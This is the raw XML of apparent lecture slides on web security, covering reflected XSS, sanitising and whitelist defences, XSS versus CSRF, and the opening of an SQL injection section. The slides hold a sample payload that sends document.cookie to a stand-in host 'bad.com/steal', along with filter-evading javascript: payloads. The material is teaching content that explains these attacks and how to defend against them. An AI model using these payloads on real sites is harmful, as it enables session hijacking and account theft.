        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="920" name="URL specially crafted by the attacker"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="736480" y="-111125"/>
              <a:ext cx="4240226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3400">
                  <a:solidFill>
                    <a:schemeClr val="accent5"/>
                  </a:solidFill>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>URL specially crafted</a:t>
              </a:r>
              <a:br/>
              <a:r>
                <a:t>by the attacker</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="923" name="Connection Line"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="443441"/>
              <a:ext cx="919128" cy="71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3" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="974" y="21600"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="-2547" y="7892"/>
                    <a:pt x="3479" y="692"/>
                    <a:pt x="19053" y="0"/>
                  </a:cubicBez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" grpId="3" animBg="1" advAuto="0"/>
      <p:bldP spid="884" grpId="4" animBg="1" advAuto="0"/>
      <p:bldP spid="890" grpId="6" animBg="1" advAuto="0"/>
      <p:bldP spid="895" grpId="7" animBg="1" advAuto="0"/>
      <p:bldP spid="901" grpId="9" animBg="1" advAuto="0"/>
      <p:bldP spid="907" grpId="8" animBg="1" advAuto="0"/>
      <p:bldP spid="913" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="919" grpId="2" animBg="1" advAuto="0"/>
      <p:bldP spid="922" grpId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Echoed in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Echoed input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="926" name="The key to the reflected XSS attack is to find instances where a good web server will echo the user input back in the HTML response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11099800" cy="2352165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>The key to the reflected XSS attack is to find instances where a good web server will echo the user input back in the HTML response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="927" name="http://victim.com/search.php?term=socks"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2889622" y="5637926"/>
            <a:ext cx="7225556" cy="4476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http://victim.com/search.php?term=socks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="928" name="&lt;html&gt; &lt;title&gt; Search results &lt;/title&gt;…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2994732" y="7221676"/>
            <a:ext cx="7216032" cy="19304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&lt;html&gt; &lt;title&gt;</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Search results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&lt;/title&gt;</a:t>
            </a:r>
          </a:p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&lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="24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Results for</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>socks</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="02000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 . .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2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&lt;/body&gt;&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="929" name="Input from bad.com:"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4494123" y="5098118"/>
            <a:ext cx="40165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/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Input from bad.com:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="930" name="Result from victim.com:"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4206328" y="6503392"/>
            <a:ext cx="459214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Result from victim.com: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" grpId="2" animBg="1" advAuto="0"/>
      <p:bldP spid="928" grpId="4" animBg="1" advAuto="0"/>
      <p:bldP spid="929" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="930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Exploiting echoed inp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Exploiting echoed input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="933" name="http://victim.com/search.php?term=    &lt;script&gt; window.open(…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3346896" y="3103152"/>
            <a:ext cx="6426480" cy="19208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http://victim.com/search.php?term=</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt; window.open(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"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     “</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://bad.com/steal?c=</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:br>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     + document.cookie)</a:t>
            </a:r>
            <a:br>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   &lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="934" name="&lt;html&gt; &lt;title&gt; Search results &lt;/title&gt;…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3005351" y="6207613"/>
            <a:ext cx="7235082" cy="19304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&lt;html&gt; &lt;title&gt;</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Search results</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/title&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="24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1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="24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Results for</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt; ... &lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="02000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. . .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="24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&lt;/body&gt;&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="935" name="Browser would execute this within victim.com’s origin"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899368" y="8810493"/>
            <a:ext cx="1120606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Browser would execute this within </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>victim.com</a:t>
            </a:r>
            <a:r>
              <a:t>’s origin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="936" name="Input from bad.com:"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4494123" y="2453604"/>
            <a:ext cx="401655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/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Input from bad.com:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="937" name="Result from victim.com:"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4326820" y="5523679"/>
            <a:ext cx="4592143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Result from victim.com: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" grpId="2" animBg="1" advAuto="0"/>
      <p:bldP spid="934" grpId="4" animBg="1" advAuto="0"/>
      <p:bldP spid="935" grpId="5" animBg="1" advAuto="0"/>
      <p:bldP spid="936" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="937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Reflected XSS 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/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Reflected XSS Summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="940" name="Target: User with Javascript-enabled browser; vulnerable web service that includes parts of URLs it receives in the output it generat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Target</a:t>
            </a:r>
            <a:r>
              <a:t>: User with </a:t>
            </a:r>
            <a:r>
              <a:rPr i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rPr>
              <a:t>Javascript-enabled browser</a:t>
            </a:r>
            <a:r>
              <a:t>; vulnerable web service that includes parts of URLs it receives in the output it generates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 goal</a:t>
            </a:r>
            <a:r>
              <a:t>: Run script in user’s browser with same access as provided to server’s regular scripts (subvert SOP)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Attacker needs</a:t>
            </a:r>
            <a:r>
              <a:t>: Get user to click on specially-crafted URL. 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t>Optional: A server for receiving stolen user information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>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Key trick</a:t>
            </a:r>
            <a:r>
              <a:t>: Server does not ensure its output does not contain foreign, embedded scripts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XSS Defense: Filter/Esca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14095">
              <a:defRPr sz="7040"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>XSS Defense: Filter/Escape</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="943" name="Typical defense is sanitizing: remove executable portions of user-provided content…"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723509" y="2609850"/>
            <a:ext cx="11557781" cy="6286500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Typical defense is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sanitizing</a:t>
            </a:r>
            <a:r>
              <a:t>: remove executable portions of user-provided content </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="2800"/>
            </a:pP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&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr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 ...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&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:t> or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&lt;javascript&gt;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...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&lt;/javascript&gt;</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr sz="2800"/>
            </a:pPr>
            <a:r>
              <a:t>Libraries exist for this purpose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Did you find everyth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Did you find everything?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="946" name="Bad guys are inventive: lots of ways to introduce Javascript; e.g., CSS tags and XML-encoded data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Bad guys are inventive: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>lots</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>of ways to introduce </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>; e.g., CSS tags and XML-encoded data:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="691444" lvl="1" indent="-246944"/>
            <a:r>
              <a:rPr sz="2000" dirty="0" smtClean="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&lt;div style="background-image: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0" err="1" smtClean="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url</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0" smtClean="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sz="2000" dirty="0" err="1" smtClean="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javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0" smtClean="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(’JavaScript’))"&gt;...&lt;/div&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="754303" lvl="1" indent="-309803">
              <a:defRPr sz="20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 smtClean="0"/>
              <a:t>&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC="javas]]&gt;&lt;![CDATA[</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1" smtClean="0"/>
              <a:t>cript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>(’XSS’);"&gt;]]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>Worse: browsers “help” by parsing broken HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" err="1" smtClean="0"/>
              <a:t>Samy</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>figured out that IE permits </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> tag to be split across two lines; evaded </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>MySpace</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> filter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Better defense: White li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r>
              <a:t>Better defense: White list</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="949" name="Instead of trying to sanitize, validate a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6709" indent="-346709" defTabSz="455675">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:defRPr sz="2807"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Instead of trying to sanitize, validate all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headers,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cookies,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query strings,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form fields, and </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="693419" lvl="1" indent="-346709" defTabSz="455675">
              <a:spcBef>
                <a:spcPts val="1100"/>
              </a:spcBef>
              <a:defRPr sz="2807"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>hidden fields (i.e., all parameters) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="346709" indent="-346709" defTabSz="455675">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:defRPr sz="2807"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>… against a rigorous spec of what should be allowed</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" smtClean="0"/>
              <a:t>.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Dynamic web pages"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1791353" y="3638550"/>
            <a:ext cx="9422094" cy="2476501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Dynamic web pages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XSS vs. CSR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XSS vs. CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="952" name="Do not confuse the two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Do not confuse the two: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XSS exploits the </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trust</a:t>
            </a:r>
            <a:r>
              <a:t> a client browser has in data sent from the legitimate website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So the attacker tries to control what the website sends to the client browser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t>CSRF exploits the </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>trust</a:t>
            </a:r>
            <a:r>
              <a:t> a legitimate website has in data sent from the client browser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So the attacker tries to control what the client browser sends to the website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" grpId="1" build="p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QL inj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SQL injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="168278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exploits_of_a_mom.png" descr="exploits_of_a_m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047" y="2581916"/>
            <a:ext cx="10834706" cy="3335008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http://xkcd.com/327/"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4134657" y="6545160"/>
            <a:ext cx="404893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http://xkcd.com/327/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3699456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ounded Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2859358" y="2926212"/>
            <a:ext cx="2450901" cy="3347357"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13333"/>
            </a:avLst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Server-side da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Server-side data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="565" name="Browser"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3114815" y="3003418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Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="566" name="Web server"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7949999" y="3003418"/>
            <a:ext cx="1939987" cy="14287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Web server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="567" name="Database"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8205616" y="5158140"/>
            <a:ext cx="1428751" cy="1032571"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 18449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Database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="568" name="Client"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3488517" y="2365838"/>
            <a:ext cx="1192582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Client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="569" name="Rounded Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7694541" y="2926212"/>
            <a:ext cx="2450901" cy="3347357"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13333"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="000000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0" name="Server"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8251806" y="2365838"/>
            <a:ext cx="133637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Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="571" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8919991" y="4488267"/>
            <a:ext cx="1" cy="61377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72" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5023594" y="3717793"/>
            <a:ext cx="2957613" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/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73" name="(Private)…"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3370433" y="5158140"/>
            <a:ext cx="1428751" cy="1032571"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 18449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r>
              <a:t>(Private)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="574" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4084808" y="4488267"/>
            <a:ext cx="1" cy="613775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75" name="Long-lived state, stored…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6527019" y="6753856"/>
            <a:ext cx="4785946" cy="1143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>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Long-lived state, stored</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="3400">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>in a separate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database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="576" name="Oval"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7999394" y="4856459"/>
            <a:ext cx="1841196" cy="1635933"/>
          </a:xfrm>
          <a:prstGeom prst="ellips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7" name="Need to protect this state from illicit access and tampering"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5717330" y="8145622"/>
            <a:ext cx="6405325" cy="11430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>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Need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protect this state</a:t>
            </a:r>
            <a:r>
              <a:t> from illicit access and tampering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="266580619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 animBg="1" advAuto="0"/>
      <p:bldP spid="576" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="57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QL (Standard Query Language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368"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>SQL (Standard Query Language)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="583" name="Users"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2529134" y="3140893"/>
          <a:ext cx="8280938" cy="344224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628578"/>
                <a:gridCol w="1292367"/>
                <a:gridCol w="1365203"/>
                <a:gridCol w="2359083"/>
                <a:gridCol w="1635707"/>
              </a:tblGrid>
              <a:tr h="539147">
                <a:tc gridSpan="5">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr sz="2400"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Users</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="38100" marR="38100" marT="38100" marB="38100" anchor="ctr" horzOverflow="overflow">
                    <a:lnL/>
                    <a:lnR/>
                    <a:lnT/>
                    <a:lnB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385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rgbClr val="FEFEFE"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Name</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" horzOverflow="overflow">
                    <a:lnT>
                      <a:noFill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rgbClr val="FEFEFE"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Gender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rgbClr val="FEFEFE"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Age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rgbClr val="FEFEFE"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Email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rgbClr val="FEFEFE"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Password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/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="483850"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Connie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/>
                      </a:pPr>
                      <a:r>
                        <a:rPr u="sng">
                          <a:hlinkClick r:id="rId2"/>
                        </a:rPr>
                        <a:t>connie@bc.com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j3i8g8ha</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="483850"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Steven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/>
                      </a:pPr>
                      <a:r>
                        <a:rPr u="sng">
                          <a:hlinkClick r:id="rId3"/>
                        </a:rPr>
                        <a:t>steven@bc.com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a0u23bt</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="483850"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Greg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34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greg@bc.com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0aergja</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
              </a:tr>
              <a:tr h="483850"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Vidalia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35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/>
                      </a:pPr>
                      <a:r>
                        <a:rPr u="sng">
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
